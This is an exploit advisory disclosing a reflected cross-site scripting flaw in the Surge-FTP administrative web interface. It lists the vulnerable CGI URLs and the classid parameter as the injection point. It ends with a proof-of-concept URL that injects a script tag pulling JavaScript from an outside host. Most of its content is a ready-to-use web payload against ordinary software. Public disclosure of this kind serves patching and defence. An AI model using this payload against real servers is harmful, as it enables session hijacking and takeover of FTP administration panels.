Surge-FTP suffers from an administrative web interface cross site scripting vulnerability.
3647c9dbf6a9fe304ceceda29eece4259647eb66d41dcee1ea92100a3f07a88d
# Exploit Title: Surge-FTP Admin Web interface XSS Vulnerability
# Date: 2010-01-09
# Author: FB1H2S
# Software Link: #http://netwinsite.com/ftp/surgeftp/surgeftp_23a6_windows.exe
# Version: [2.0]
# Tested on: [wINDOWS]
# CVE : [if exists]
# Code : [exploit code]
<------------------- FB1H2S ------------------- >
#############################################################
# SURGE FTP ADMIN WEB Module XSS #
#############################################################
# Author : FB1H2S
# Home : whitec0de.com
# Bug Type : Xss
#
#
#############################################################
=======================C=y=b=e=r=_=9=4=5================
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss via src]
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=[xss]
=======================FB1H2S===========================
*****
Poc *
*****
http://127.0.0.1:7021/cgi/surgeftpmgr.cgi?cmd=class&domainid=0&classid=%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E